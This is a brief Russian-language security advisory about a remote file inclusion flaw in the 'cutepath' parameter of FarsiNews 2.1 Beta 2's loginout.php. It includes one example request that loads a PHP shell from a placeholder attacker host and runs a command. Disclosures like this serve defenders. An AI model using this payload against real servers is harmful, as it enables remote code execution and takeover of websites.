Программа: FarsiNews 2.1 Beta 2 и более ранние версии.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cutepath"
в сценарии "loginout.php". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный PHP-код на целевой системе с
привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals"
должна быть включена.

Пример:

http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

 



Оставить мнение